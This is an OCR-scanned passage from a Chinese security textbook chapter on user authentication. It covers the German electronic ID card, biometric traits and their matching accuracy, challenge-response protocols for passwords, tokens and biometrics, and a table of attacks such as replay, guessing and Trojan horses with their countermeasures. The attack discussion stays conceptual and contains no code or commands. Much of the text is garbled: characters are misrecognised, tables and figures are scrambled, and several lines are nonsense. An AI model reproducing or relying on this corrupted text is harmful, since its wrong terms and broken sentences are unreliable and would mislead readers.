重要 ， 即 公民 身份 证 智能 卡 化 。 在 涉 入 政 府 机 构 或 商业 。。 PTS 二 协议 类 型 选择 


服务 时 ， 国 家 电子 身份 证 (electronic IDentify，eID) 不 仅 图 3-6 智能 卡 与 读 卡 器 的 交互 





3# APHE 6l 


可 以 作为 国家 身份 证 ， 还 可 以 行使 其 他 多 种 证 件 的 功能 ， 例 如 驾驶 证 。 男 外 ， 电 子 号 份 证 在 各 
种 应 用 中 可 以 更 有 效 地 证 明 持 有 人 的 身份 。 事 实 上 ， 一 张 电子 身份 证 就 是 一 张 被 国家 政府 验证 
的 可 信和 有 效 的 智能 卡 。 
最 新 、 最 前 沿 的 电子 身份 证 大 规模 应 用 是 德国 电子 身份 证 一 一 新 身份 证 (neuer 
Personalausweis) [POLL12]。 该 卡 的 表面 印 有 人 可 以 阅读 的 信息 ， 其 中 包括 : 
e 个 人 信息 : 例如 姓名 、 出 生日 期 及 住址 ; 此 类 信息 一 般 在 护照 或 四 驶 执照 等 证 件 上 也 
可 找到 。 
e 文档 编号 : 每 一 张 智 能 卡 均 配 有 的 由 9 位 字母 或 数字 构成 的 唯一 识别 符 。 
e 卡片 接 入 号 (Card Access Number, CAN): 印刷 于 智能 卡 表 面 的 6 位 随机 的 十 进 制 数字 。 
这 些 数字 被 当 作 口令 使 用 ， 下 文中 会 解释 它 。 
e 机 器 读 卡 区 ( Machine Readable Zone, MRZ): 智能 卡 背 面 的 三 行文 字 ， 人 类 和 机 器 均 
可 阅读 。 这 些 文本 同样 也 可 作为 口令 使 用 。 
电子 身份 证 的 功能 ”电子 身份 证 具有 以 下 三 种 独立 的 功能 ， 每 种 功能 都 具有 自己 的 受 保 护 
数据 集 (参见 表 3-4 ): 
e ePass 功能 : 该 功能 存储 表示 持 有 者 身份 的 数字 信息 ， 专 为 政府 部 门 保 留 使 用 。 该 功 
能 使 得 电子 身份 证 类 似 于 一 个 电子 护照 。 其 他 政府 职能 服务 也 会 用 到 ePass 功能 。 该 
功能 必须 在 智能 卡 上 实现 。 
e elD 功能 : 该 功能 在 政府 和 商业 的 各 种 应 用 中 通用 。 电 子 身 份 功能 存储 持 有 人 的 身份 
记录 ， 以 便 授权 的 服务 在 持 有 者 允许 的 情况 下 使 用 。 公 民 可 根据 意愿 选择 是 否 激活 该 


e eSign 功能 : 该 功能 是 可 选 的 ， 其 作用 是 存储 私 铀 和 用 于 验证 私 钥 的 证 书 ; 它 用 于 生 
成 持 有 人 的 数字 签名 。 证 书 由 一 个 私有 可 信 中 心 发 布 。 


表 3-4 ”电子 身份 证 的 功能 和 数据 


| 面部 特征 ; 两 个 指 | Ae Oy 
ePass (强制 ) waa CAN a MRZ | 纹 图 像 (可 选 ); MRZ | 保留 的 离线 生物 特征 
数据 进行 身份 验证 


”在 线 应 用 读 取 数 据 或 姓名 、 艺 名 和 博士 | ”身份 证 明 ， 年 龄 验 
eID (可 选 激活 ) 访问 授权 功能 学 位 ， 出 生地 及 出 生 | 证， 社区 有 DD 验证 ， 受 


离线 检测 系统 读 取 数 | 日 期 ， 住 址 和 社区 ID, | 限 的 身份 证 明 (化 名 )、 
据 并 更 新 住址 和 社区 ID | “CAN 或 MRZ | 有 效 期 消除 疑问 


eSign (可 选 证 书 ) | ZARA eSign 的 PIN | 签名 生成 
:ca CAN 
生成 数字 签名 


CAN= 三 卡片 接 入 号 
MRZ 王 机 器 读 卡 区 
PACE 二 口令 认证 连接 设施 
PIN 二 个 人 标识 码 







ePass 功能 是 离线 功能 。 也 就 是 说 ， 该 功能 仅 在 持 卡 人 出 示 智 能 卡 的 当地 使 用 ， 而 不 是 通 
过 网 络 使 用 ， 例 如 通过 某 地 的 护照 检查 。 

eID 功能 可 被 用 于 在 线 和 离线 服务 。 一 个 典型 的 例子 就 是 离线 检测 系统 ， 它 是 用 于 执法 检 
测 的 终端 ， 此 系统 通常 由 警察 局 或 人 境 管 理 部 门 使 用 。 离 线 检测 系统 可 以 读 取 持 卡 人 的 身份 信 
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息 和 智能 卡 中 的 生物 特征 信息 ， 例 如 面部 特征 和 指纹 。 生 物 特征 信息 可 被 用 于 验证 当前 使 用 智 
能 卡 的 人 是 否 就 是 真正 的 持 卡 人 。 

用 户 认证 是 一 个 很 好 的 eID 在 线 应 用 的 例子 。 图 3-7 描述 了 一 个 基于 Web 的 场景 。 开 始 
时 ，eID 用 户 访问 一 个 网 站 ， 并 请 求 一 项 需 认 证 的 服务 。 网 站 返回 一 个 重 定向 消息 ， 该 消息 转 
发 至 eID 服务 器 。eID 服务 器 请 求 用 户 输 入 其 电子 身份 证 的 PIN。 一 旦 用 户 输入 了 正确 的 PIN, 
电子 身份 证 便 可 与 终端 读 取 需 以 密 文 形 式 进行 数据 交换 。 随 后 ， 服 务 器 与 电子 身份 证 上 的 微 处 
理 器 进行 认证 协议 交换 。 如 果 用 户 确 实 是 认证 用 户 ， 那 么 服务 器 将 认证 结果 返回 给 用 户 系统 ， 


并 重 定 向 至 Web ARF HELA. 


6. 用 户 输入 PIN 





1. 用 户 请 求 服务 
( 例如， 通过 网 
页 浏览 器 ) 





图 3-7 利用 eID 的 用 户 认证 


在 上 述 的 场景 中 ， 用 户 系统 中 需要 具备 相应 的 软 硬 件 。 用 户 系 统 上 的 软件 具有 请 求 和 接收 
PIN 码 以 及 消息 重 定向 的 功能 。 而 且 便 件 需要 电子 身份 证 读 取 需 ， 该 读 取 需 可 以 是 非 接 触 式 或 
接触 式 的 外 置 读 取 器 ， 也 可 以 是 非 接 触 式 的 内 置 读 取 天 。 

口令 认证 连接 设施 (PACE) 口令 认证 连接 设施 (Password Authenticated Connection Establish- 
ment, PACE) 能 够 确保 非 接触 式 的 RF 芯片 和 电子 身份 证 信息 在 没有 明确 访问 控制 的 情况 下 不 
能 被 读 取 。 对 于 在 线 应 用 而 言 ， 只 有 用 户 输入 了 仅 持 卡 人 知道 的 6 位 PIN 后 ， 他 才 有 权 使 用 
该 卡 。 对 于 离线 应 用 而 言 ， 智 能 卡 背 面 印 有 的 MRZ 和 正面 的 卡片 接 入 号 ( CAN) 均 可 被 用 于 
认证 。 


3.4 生物 特征 认证 


生物 特征 认证 系统 是 通过 个 人 唯一 拥有 的 身体 特征 来 实现 认证 的 。 这 些 特征 既 包 括 静 态 特 
征 如 指纹 、 手 形 、 面 部 特征 、 视 网 膜 和 虹膜 等 ， 也 包括 动态 特征 如 声 纹 和 签名 等 。 本 质 上 ， 生 
物 特征 认证 是 基于 模式 识别 的 。 与 口令 和 令 牌 的 方法 相 比 ， 生 物 特 征 认 证 实现 技术 较为 复杂 ， 
成 本 也 较 高 。 然 而 在 很 多 特殊 情况 下 ， 生 物 特征 认证 方法 被 广泛 使 用 。 目 前 生物 特征 认证 技术 
已 经 趋 于 成 熟 ， 可 以 作为 计算 机 系统 进行 用 户 认证 的 标准 工具 。 
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3.4.1 用 于 生物 特征 认证 应 用 的 身体 特征 


很 多 不 同类 型 的 身体 特征 ， 在 用 户 认证 中 已 经 在 应 用 或 者 正在 研究 之 中 。 常 见 的 包括 以 下 各 项 : 

© 面部 特征 (facial characteristic): 面部 特征 是 人 对 人 (human-to-human) 识别 中 最 常用 的 
方法 ， 因 此 ， 很 自然 地 被 纳入 到 使 用 计算 机 进行 认证 的 方法 中 。 最 常用 的 方法 是 基于 
AAT (ie Se A BE BAS A GORE, JAE. AA. RS AP SH) 的 形状 来 细 化 面部 特 
征 。 男 外 一 种 方法 ， 是 使 用 红外 线 照 相机 拍摄 一 张 与 人 脸 内 部 隐 含 的 血管 系统 相关 的 
面部 温 谱 图 (thermogram ) 。 

© 指纹 (fingerprint): 指纹 作为 身份 识别 的 方法 已 经 有 上 百年 的 历史 ， 并 且 出 于 执法 的 目 
的 ， 指 纹 识别 的 过 程 已 经 被 系统 化 和 自动 化 了 。 指 纹 ， 就 是 指 尖 表 面 的 纹路 裙 皱 的 模 
式 。 每 个 人 的 指纹 在 全 人 类 中 被 认为 是 唯一 的 。 在 应 用 中 ， 指 纹 识 别 和 匹配 系统 会 自 
动 地 对 指纹 中 的 特征 进行 提取 ， 并 对 指纹 的 全 部 模式 进行 数字 化 存储 。 

e 手 形 (hand geometry): 手 形 系统 标识 手掌 的 特征 ， 包 括 形 状 、 手 指 的 长 度 和 宽度 等 。 

e 视网膜 模式 〈 retinal pattern): 由 视网膜 表面 下 的 静脉 形成 的 特征 具有 唯一 性 ， 因 此 适 
合 于 认证 。 视 网 膜 生物 特征 认证 系统 ， 通 过 发 射 低 强度 的 可 见 光 或 者 红外 射线 扫描 眼 
睛 得 到 视网膜 模式 的 数字 图 像 特征 。 

o 虹膜 (iris): 男 一 种 唯一 的 身体 特征 是 具有 复杂 结构 的 虹膜 。 

e 签名 (signature): 每 一 个 人 都 有 自己 特有 的 笔迹 ， 这 种 特征 在 签名 上 表现 得 很 明显 。 

签名 通常 是 频繁 书写 的 序列 。 尽 管 如 此 ， 同 一 个 人 的 多 次 签名 样本 很 可 能 是 不 同 的 。 

这 使 得 做 出 签名 的 计算 机 表示 并 将 其 用 于 与 将 来 的 样本 进行 匹配 变 得 非常 复杂 。 

AB (voice): 虽然 一 个 人 的 签名 风格 不 仅 反 映 了 其 唯一 的 物理 属性 ， 也 反映 了 其 形成 的 书 

写 习 惯 。 但 是 一 个 人 的 语音 特征 与 这 个 人 的 身体 和 解剖 特征 结合 得 更 紧密 。 然 而 ， 由 于 同 

一 个 说 话 者 的 语音 样本 随 着 时 间 的 推移 有 所 变化 ， 这 使 得 语音 识别 工作 变 得 复杂 起 来 。 

图 3-8 大 致 地 给 出 了 这 些 生物 特征 测量 方法 的 相对 代价 

和 准确 度 。 准 确 度 的 概念 并 不 适合 于 利用 智能 卡 和 口令 的 用 

户 认证 方案 。 例 如 ， 当 用 户 输入 口令 时 ， 该 口令 必须 完全 匹 -> 

配 预期 口令 才能 完成 用 户 身 份 的 确认 。 在 使 用 生物 特征 认证 守旧 

时 ， 系 统 必 须 确 定 提 供 的 生物 特征 和 系统 存储 的 特征 接近 到 

什么 程度 才 认 为 是 匹配 的 。 在 详细 阐述 生物 特征 准确 度 之 


le ` ` 4 Tr. | 准确 度 
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前 ， 我 们 必须 了 解 生物 特征 认证 系统 是 如 何 工作 的 图 3.8 使 用 不 同 生物 特征 认证 的 
3.4.2 生物 特征 认证 系统 的 运行 成 本 与 准确 度 的 对 比 


图 3-9 显示 了 一 个 生物 特征 认证 系统 的 运行 过 程 。 每 一 个 被 包含 在 授权 用 户 数 据 库 中 的 认 
证 个 人 ， 首 先 必须 在 系统 中 注册 (enrolled)。 这 类 似 于 给 用 户 分 配 口令 。 对 于 一 个 生物 特征 认 
证 系统 ， 用 户 需 要 给 系统 提供 一 个 用 户 名 以 及 某 种 类 型 的 口令 或 PIN， 同时 认证 系统 的 传感器 
需要 来 集 用 户 的 生物 特征 (如 右手 食指 指纹 )。 系 统 将 输入 的 生物 特征 数字 化 并 提取 出 特征 集 
合 ， 并 将 这 些 代表 唯一 生物 特征 的 数据 或 数据 集合 保存 起 来 。 这 些 数 据 集合 被 称 为 该 用 户 的 模 
板 (template)。 现 在 用 户 已 经 完成 了 在 系统 中 的 注册 ， 系 统 维护 着 用 户 名 (ID)， 可 能 还 有 用 户 
的 PIN 或 者 口令 ,以 及 生物 特征 值 。 

根据 不 同 的 应 用 ， 生物 特征 认证 系统 的 用 户 认 证 包括 验证 (verification) 或 识别 
( identification)。 验 证 类 似 于 用 户 使 用 存储 卡 或 智能 卡 并 结合 口令 或 PIN 登录 到 系统 。 对 于 
生物 特征 验证 ， 用 户 需 要 输入 一 个 PIN， 并 使 用 传感器 采集 生物 特征 信息 。 系 统 提取 相应 特 
征 ， 并 将 其 与 为 该 用 户 保 存 的 模板 进行 比较 。 如 果 匹 配 ， 则 完成 对 这 个 用 户 的 身份 认证 。 
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对 于 识别 系统 ， 个 人 只 需要 使 用 生物 传 感 硕 而 不 需要 提供 其 他 额外 的 信息 。 系 统 将 当前 提 


供 的 模板 与 预先 存储 的 模板 进行 比较 。 


如 有 果 匹 配 ， 则 用 户 被 识别 。 否 则 ， 用 户 被 拒绝 。 









用 户 身份 或 
“未 识别 用 户 ” 


c) 识别 


图 3-9 一 个 通用 的 生物 特征 认证 系统 。 注 册 过 程 将 会 在 系统 中 为 用 户 和 和 用户 的 生 
物 特征 创建 一 个 关联 。 根 据 应 用 的 不 同 ， 用 户 认证 包括 验证 声称 的 用 户 是 
否 是 真实 的 用 户 ， 或 者 识别 系统 未 知 的 用 户 


3.4.3 ”生物 特征 认证 的 准确 度 


在 生物 特征 认证 方案 中 ， 每 一 个 
个 体 的 某 种 身体 特征 会 被 映射 成 数字 
表示 。 对 于 每 一 个 个 体 ， 都 有 一 个 数 
字 表 示 或 模板 存储 在 计算 机 中 。 当 有 
用 户 要 被 认证 时 ， 系 统 将 会 对 存储 的 
用 户 模板 和 目前 获取 到 的 用 户 模 板 进 
行 对 比 。 由 于 身体 特征 的 复杂 性 ,我 
们 不 能 期 望 这 两 个 模板 是 完全 匹配 
的 。 相 应 地 ， 系 统 通 过 一 种 算法 来 产 
生 输入 的 用 户 模板 与 预先 存储 的 用 
户 模板 之 间 的 匹配 分 数 (通常 是 一 个 
数 )， 用 于 量化 两 者 的 相似 程度 。 

图 3-10 说 明了 系统 面 对 的 困难 
选择 。 如 果 在 系统 中 对 被 指定 的 某 一 
个 用 户 进 行 多 次 测试 ， 匹 配 分 数 s 将 
会 有 变化 ， 它 的 概率 密度 函数 形 如 图 
中 所 示 的 钟 形 曲 线 。 例 如 ， 在 指纹 认 


概率 密度 
函数 





冒名 顶替 者 真正 用 户 的 匹配 分 数 
的 平均 匹配 值 平均 匹配 值 (s) 


图 3-10 授权 用 户 和 冒名 项 蔡 者 的 生物 特征 曲线 。 在 本 描述 中 ， 
将 提交 的 特征 和 参考 特征 之 间 的 差异 简化 为 一 个 数值 。 
如 果 输 入 值 (s) 大 于 预先 指定 的 国 值 (0), BARA 
是 匹配 的 
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证 中 ， 结 果 可 能 由 于 传感器 噪声 的 影响 而 变化 ， 手 指 肿胀 或 者 干燥 等 也 可 能 影响 到 结果 ， 手 指 
的 放置 位 置 等 因素 也 会 对 匹配 结果 有 所 影响 。 平 均 而 言 ， 其 他 人 的 匹配 分 数 应 该 低 得 多 ， 但 也 
会 呈现 出 钟 形 的 概率 密度 函数 。 困 难 在 于 真正 的 用 户 和 冒名 顶替 者 的 匹配 分 数 的 范围 与 给 定 的 
参考 模板 相 比 ， 很 可 能 是 重 又 的 。 在 图 3-9 中 设置 了 一 个 国 值 :{， 当 分 数 s 三 t 时， 就 认为 匹配 ; 
当 得 分 s<t 时 ， 就 认为 不 匹配 。 阅 值 1 右边 的 阴影 部 分 表示 可 能 发 生 误 匹配 的 区 域 ， 左边 的 阴 
影 部 分 表示 可 能 发 生 漏 匹 配 的 区 域 。 每 个 阴影 区 域 的 面积 分 别 表 示 误 匹配 和 漏 匹 配 的 概率 。 通 
i BO (AL 上 的 左 移 和 右 移 可 以 调整 这 两 个 概率 。 但 要 注意 ， 误 匹配 率 下 降 必 然 导 致 漏 匹 配 率 的 上 
升 ， 反 之 亦 然 。 

对 于 一 个 给 定 的 生物 特征 认证 方案 ， 可 以 绘制 误 匹 配 率 - 漏 匹 配 率 曲线 ， 我 们 称 之 为 运 
行 特征 曲线 (operating characteristic curve)。 图 3-11 就 是 两 个 不 同系 统 的 运行 特征 曲线 。 左 
侧 偏 下 曲线 的 表现 明显 更 好 。 曲 线 上 的 圆 点 对 应 测量 中 的 一 个 特殊 靖 值 。 国 值 癌 左 上 方 变换 
可 增强 系统 的 安全 性 ， 相 应 的 代价 是 降低 了 便利 性 。 其 中 ,造成 不 便 的 原因 是 合法 用 户 可 能 
被 拒绝 访问 并 需 进一步 认证 。 合理 的 权衡 是 选择 的 阔 值 应 该 对 应 于 曲线 上 两 个 比率 值 相等 的 
点 。 一 个 要 求 高 安全 性 的 应 用 可 能 要 求 误 匹 配 率 非常 低 ， 应 选择 偶 问 于 曲线 左 侧 的 点 。 对 于 
取证 应 用 ， 系 统 则 应 降低 漏 匹 配 率 ， 尽 可 能 地 不 漏 掉 嫌疑 人 。 

图 3-12 给 出 了 对 实际 产品 测试 产生 的 特征 曲线 。 虹 膜 特征 认证 系统 在 超过 200 万 个 交 
又 比较 中 没有 出 现 一 次 误 匹 配 。 对 误 匹 配 率 整体 考虑 ， 可 以 看 出 面部 特征 认证 方法 的 效果 
最 差 。 
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漏 匹 配 率 
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0.1% = 
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图 3-11 理想 化 的 生物 特征 测量 运行 特征 曲线 (对 数 - 对 数 比 例 ) 
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图 3-12 [MANSO1] 报道 的 真实 生物 特征 测量 运行 特征 曲线 。 为 了 更 清楚 地 表示 出 各 个 系统 
的 差异 ， 图 中 采用 了 对 数 - 对 数 刻度 


10% 100% 


3.5 ”远程 用 户 认证 


最 简单 的 用 户 认 证 方式 就 是 本 地 认证 ， 即 用 户 试 图 访问 本 地 的 系统 ， 如 单机 的 办 公 PC 或 
者 ATM 机 。 复 杂 一 些 的 情况 则 是 通过 Internet、 网 络 、 通 信 线 路 的 远程 用 户 认 证 。 远 程 用 户 认 
证 的 方式 增加 了 很 多 安全 威胁 ， 例 如 口令 窃听 或 者 对 观察 到 的 用 户 认 证 过 程 进 行 重 放 等 。 

为 了 应 对 对 远程 用 户 认 证 的 攻击 ， 系 统 逐 渐 依赖 于 某 种 形式 的 挑战 - 应 答 协 议 。 本 节 我 们 
将 针对 本 章 讨论 的 各 种 认证 方法 解释 一 下 这 些 协议 的 基本 要 素 。 


3.5.1 口令 协议 


图 3-13a 提供 了 一 个 通过 口令 认证 的 挑战 -应答 协议 的 简单 例子 。 实 际 使 用 的 协议 (如 
第 23 章 讨 论 的 Kerberos) 更 加 复杂 。 在 这 个 例子 中 ， 用 户 首先 把 他 的 身份 发 送 给 远程 主机 ， 
远程 主机 将 产生 一 个 随机 数 +， 通常 称 为 nonce 值 ， 并 将 这 个 nonce 值 返 回 给 用 户 。 此 外 ， 远 
程 主机 需要 指定 两 个 函数 h() 和 .70 在 啊 应 过 程 中 使 用 。 从 远程 主机 到 用 户 的 数据 传输 称 为 挑 
战 (challenge)。 用 户 的 响应 是 函数 f(r'"，h(P'))=r 的 值 ， 其 中 xr'=r 并且 P' 是 用 户 的 口令 。 函 
数 h() 是 一 个 散 列 函数 ， 所 以 啊 应 中 包含 了 通过 70 函数 组 合 起 来 的 随机 数 和 用 户口 令 的 散 列 
函数 值 。 

远程 主机 存储 了 每 一 个 注册 用 户 的 口令 的 散 列 值 ， 对 于 用 户 U 使 用 APU) 来 表示 。 当 收 
到 应 答 时 ， 远 程 主机 计算 出 函数 /AP(O))) 的 值 并 与 收 到 的 f(r APY 值 进行 对 比 。 如 果 数 
值 相等 ， 那 么 该 用 户 就 被 认证 。 

这 种 策略 可 以 抵御 几 种 形式 的 攻击 。 远 程 主机 存储 的 并 不 是 口令 ， 而 是 口令 的 散 列 值 。 正 
如 在 3.2 节 中 讨论 过 的 ， 对 于 入 侵 到 主机 的 攻击 者 ， 这 种 口令 存储 方式 是 比较 安全 的 。 此 外 ， 
散 列 口令 并 不 是 直接 进行 传输 的 ， 而 是 传输 一 个 以 散 列 口令 作为 参数 的 函数 。 因 此 ， 对 于 一 个 
适当 的 散 列 函数 (0, 口令 在 传输 过 程 中 是 不 会 被 捕获 到 的 。 最 后 ， 使 用 随机 数 作为 函数 f0 的 
参数 可 以 抵御 重 放 攻击 。 


3.5.2 令 牌 协议 


图 3-13b 给 出 了 一 个 令 牌 协议 认证 的 简单 例子 。 和 前 面 一 样 ， 用 户 首先 发 送 他 的 用 户 喘 份 
给 远程 主机 。 远 程 主机 返回 需 在 响应 中 使 用 的 随机 数 和 验证 函数 AO FISO 的 标识 符 。 在 用 户 
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端 ， 令 有 牌 提供 了 一 个 验证 码 (passcode) W'。 令 有 牌 存储 一 个 静态 验证 码 或 者 生成 一 个 一 次 性 的 
随机 验证 码 。 对 于 一 次 性 的 随机 验证 码 ， 令 牌 必 须 以 一 定 的 方式 和 远程 主机 进行 同步 。 无 论 哪 
种 情况 ， 用 户 通过 输入 口令 P' 来 激活 验证 码 ， 这 个 口令 仅仅 被 用 户 和 令 牌 共享 ， 而 与 远程 主 
HEX. SHERR SA, AWN 的 值 对 远程 主机 进行 响应 。 对 于 静态 验证 码 ， 远 程 主机 存储 
了 散 列 值 AWU) ; 对 于 动态 验证 码 ， 远 程 主机 需要 生成 一 个 一 次 性 的 验证 码 (与 由 令 牌 产生 
的 验证 码 同步 )， 并 且 计 算 它 的 散 列 值 。 之 后 的 认证 过 程 同 口令 协议 认证 过 程 一 样 。 


-3 











客户 端 
ac ies 远程 主机 远程 主机 
Up D> u, AE —_o» 
r, 随机 数 r, 随机 数 
AO, hO. OK hO, hO., fO, 函数 
hO. SO) pi Wp i Tit 
one f(r’, h(P’)) oo flr', h(W')) 
,的 3 r’, h(P' — 的 验证 码 ,A(W'))= 
六 7 的 返回 一 一 一 一 一 一 f(r',h(P'))= r, /的 返回 f(r', hWW')) f(r, h(WU))) 
flr, h(P(U)) 一 一 一 一 ”如 果 成 立 则 
如 果 成 立 则 > fill 
yes, 否则 no 
yes/no 
二 一 一 一 
a) 口令 协议 b) 令 牌 协议 
客户 六 远程 主机 本 远程 主机 
u, 用户 一 > U, 用户 一 一 一 > 
r, 随机 数 r, 随机 数 
(x,E0) ”E50, 函数 x, 随机 挑战 序列 
-bb E(), 
a (r, x, EQ) (), 函数 
D'， 生 物 特征 i B', x'—> BS'(x') 
RERA E(r', D', BT’) n gE EBSD | 
rz 的 返回 E"E(r', P', BT')= E“E(r', BS'(x'))= 
(r', P', BT’) (r', BS'(x')) 
r'=r, DED BT'=BT(U) 从 (六 BS'(x’)) PSE HLB' 
如 果 成 立 则 yes， r'=r, x'=x, B= 
yes/no 否则 no B(U) 如 果 成 立 则 yes， 
yes/no 否则 no 
二 一 
c) 静态 生物 特征 认证 协议 d) 动态 生物 特征 认证 协议 


图 3-13 ”用 于 远程 用 户 认证 的 基本 挑战 - 应 答 协 议 
KR: 基于 [OGOR03] 


3.5.3 ”静态 生物 特征 认证 协议 


图 3-13c 是 一 个 使 用 静态 生物 特征 的 用 户 认 证 协议 的 例子 。 和 前 面 一 样 ， 用 户 发 送 ID 给 
远程 主机 ， 远 程 主机 通过 随机 数 r 和 加 密 函 数 的 标识 符 进 行 响应 。 在 用 户 端 ， 有 一 个 控制 生物 
特征 采集 设备 的 客户 端 系统 。 该 系统 根据 用 户 的 生物 特征 B' 生 成 一 个 生物 特征 模板 BT'"， 并 返 
EZX Er, D', BT’), FL D' 表示 该 特定 的 生物 特征 采集 设备 。 远 程 主机 通过 对 收 到 的 密 文 消 
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息 进行 解密 来 得 到 传输 的 三 个 参数 ， 并 与 远程 主机 中 存储 的 数据 进行 对 比 。 对 于 匹配 的 情况 ， 
一 定 有 r'=ro lI, BT 与 远程 主机 中 存储 的 用 户 模 板 之 间 的 匹配 分 数 也 一 定 会 超过 预先 设置 
的 阔 值 。 最 后 ， 主 机 还 需要 通过 判断 生物 特征 采集 设备 的 ID 是 否 存在 于 主机 数据 库 中 的 注册 
设备 列表 来 对 生物 特征 采集 设备 进行 简单 的 认证 。 


3.5.4 动态 生物 特征 认证 协议 


图 3-13d 是 一 个 使 用 动态 生物 特征 的 用 户 认证 协议 的 例子 。 其 和 静态 生物 特征 认证 最 主 
要 的 不 同 是 远程 主机 提供 了 一 个 随机 序列 x 以 及 一 个 随机 数 > 作 为 挑战 。 这 个 挑战 序列 是 由 数 
字 、 字 符 或 者 单词 组 成 的 序列 。 位 于 客户 端的 用 户 必 须 通 过 发 音 (讲话 者 验证 )、 打 字 (键盘 动 
态 验证 ) 或 者 手写 (笔迹 验证 ) 来 产生 一 个 生物 特征 序列 信号 BS'(x”)。 之 后 ， 客 尸 端 要 对 生物 
信号 和 随机 数 加 密 。 远 程 主机 在 接收 到 信息 后 进行 解密 操作 ， 收 到 的 随机 数 x' 必须 和 最 初 作 
为 挑战 的 随机 数 >” 完全 匹配 。 此 外 ， 远 程 主机 根据 输入 的 生物 特征 信号 85'(x”)、 已 存储 的 该 用 
户 的 模板 BT(U) 及 原始 信号 x 生成 一 个 比较 值 。 如 果 该 比较 值 超过 了 预 设 的 国 值 ， 那 么 用 户 就 
可 通过 认证 。 


3.6 用户 认 证 中 的 安全 问题 


与 任何 一 种 安全 服务 一 样 ， 用 户 认证 ， 特 别 是 远程 用 户 认 证 ， 都 会 遭受 各 种 各 样 的 攻击 。 
K 3-5 (iA [OGOR03]) 总 结 了 用 户 认证 中 主要 的 攻击 方式 ， 并 依据 认证 手段 的 类 型 对 其 进行 
了 分 解 。 该 表 的 大 部 分 内 容 是 目 解释 的 ， 我 们 只 对 表 中 的 茶 些 条 目 加 以 扩展 。 


表 3-5 一 些 潜在 攻击 、 易 受 攻击 的 认证 手段 与 典型 的 防范 措施 


TE: TEL 
口令 猜 解 ; 穷 举 搜索 提高 粹 ， 限 制 尝试 次 数 
客户 端 攻击 提高 炳 ， 限 制 尝试 次 数 


采用 散 列 函数 ; Heh; 保护 口令 
数据 库 


i 采用 散 列 函数 ; FE; 保护 口令 
人 . ’ 
ais me diniin 数据 库 ; 使 用 一 次 性 验证 码 


令 牌 
窃取 模版 ee 挑战 — 
以 
4> 


口令 窃取 明文 ; 字典 / 穷 举 搜索 





TT 
ees ees 多 因素 认证 ; AD RoI OH 
复制 (欺骗 ) 生物 特征 对 采集 设备 复制 检测 和 认证 
重 放 被 窃取 的 口令 响应 信息 | ”挑战 - 应 答 协议 
ät 重 放 被 窃取 的 认证 码 响应 信息 “| ”挑战 -应 答 协 议 ， 一 次 性 验证 码 


生物 特征 重 放 被 窃取 的 生物 特征 模版 响 | ”防止 采集 设备 端的 复制 操作 ; 通过 
应 信息 挑战 - 应 等 协议 进行 设备 认证 
‘ oa, OH} ou, is l 客户 端 认 证 或 者 采用 安全 可 信 的 采 
特洛伊 木马 eiit 安装 窃听 软件 或 信息 截获 设备 | 集 设 各 
定 


By Be 
拒绝 服务 ed 令 牌 、| 通过 多 次 失败 的 认证 将 用 户 锁 带 令 牌 的 多 因素 认证 
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客户 端 攻 击 ( client attack) ERE EOLA Ta oF, KAA 
eM — PAK POR SERA PUGET A. HATET SUGEN AS, BFR REST 
图 对 口令 进行 多 种 猜 解 ， 猜 测 可 能 的 用 户口 令 。 一 种 极端 情况 是 尝试 所 有 可 能 的 口令 。 阻 止 这 
种 攻击 的 一 种 方法 是 选择 既 长 又 不 可 预测 的 口令 。 事 实 上 ， 这 种 口令 的 炳 很 大 ; 也 就 是 说 ， 需 
要 很 多 位 来 表示 。 男 外 一 种 解决 方法 ， 是 限制 指定 信 源 在 一 定时 间 内 的 尝试 次 数 。 

令 牌 可 以 通过 一 个 炉 很 低 的 PIN 或 者 口令 产生 一 个 焙 很 高 的 验证 码 ， 以 防止 穷 举 搜索 。 
即便 是 敌手 能 够 猜 到 或 者 获取 了 口令 ， 但 是 他 仍然 必须 获得 物理 令 牌 才能 成 功 。 

主机 攻击 ( host attack) 是 直接 对 存储 在 主机 上 的 用 户 文件 进行 的 攻击 ， 主 机 上 存储 着 用 
户口 令 、 令 牌 认证 码 或 者 生物 特征 模板 。3.2 节 已 讨论 了 关于 口令 安全 的 注意 事项 。 对 于 令 牌 ， 
可 以 使 用 一 次 性 验证 码 ， 从 而 避免 认证 码 在 主机 中 存储 。 用 户 的 生物 特征 很 难保 证 其 安全 ， 因 
为 这 些 是 用 户 的 身体 特征 。 对 于 静态 生物 特征 认证 ， 可 以 加 入 对 生物 特征 采集 设备 的 认证 。 对 
于 动态 生物 特征 的 认证 ， 可 以 采用 挑战 - 应答 协议 加 强 安全 性 。 

在 口令 认证 的 语 境 下 ， 窃 昕 (eavesdropping) 是 指 敌 手 试 图 通过 观察 用 户 ， 找 到 口令 的 手 
写 副本 或 者 类 似 的 用 户 与 敌手 近 距 离 接触 的 机 会 而 得 知 口令 。 另 外 一 种 禾 听 口令 的 方式 是 按键 
记录 (键盘 记录 )。 它 通过 安装 在 用 户 计算 机 上 的 恶意 程序 捕捉 按键 记录 ， 通 过 事后 分 析 来 获 
取 口 令 。 依 赖 于 多 因素 认证 (如 口令 加 令 牌 或 口令 加 生物 特征 ) 的 系统 可 以 抵御 此 类 攻击 。 对 
于 令 牌 ， 类 似 的 威胁 是 令 牌 被 盗窃 (theft) 或 者 对 令 牌 进行 物理 复制 。 同 样 ， 使 用 多 因素 认证 ， 
相对 于 纯 令 牌 认证 协议 ， 可 以 防止 在 令 牌 被 盗窃 的 情况 下 产生 的 安全 威胁 。 对 生物 特征 协议 的 
类 似 威胁 是 复制 (copy) 或 模仿 生物 特征 参数 而 生成 想 要 的 模板 。 动 态 生 物 特征 不 易于 受到 此 
类 攻击 。 对 于 静态 生物 特征 ， 对 数据 采集 设备 进行 认证 是 一 个 有 效 的 对 抗 手 段 。 

Bm (replay) 是 敌手 对 以 前 截获 到 的 用 户 响 应 消息 进行 重 放 的 一 种 攻击 。 对 于 此 类 攻击 
最 常用 的 对 抗 措 施 是 挑战 - 应 答 协 议 。 

在 特洛伊 木马 攻击 (Trojan horse) 中 ， 应 用 或 物理 设备 冒充 成 认证 服务 所 使 用 的 应 用 或 物 
理 设备 来 捕获 用 户口 令 、 验 证 码 或 生物 特征 信息 。 之 后 ， 敌 手 可 以 使 用 捕获 到 的 信息 冒充 合法 
用 户 。 一 个 简单 例子 就 是 使 用 伪造 的 银行 终端 机 来 截获 用 户 ID 和 口令 的 组 合 信息 。 

拒绝 服务 ( denial-of-service) 攻击 是 试图 通过 大 规模 的 认证 请 求 使 认证 服务 失效 。 一 种 更 
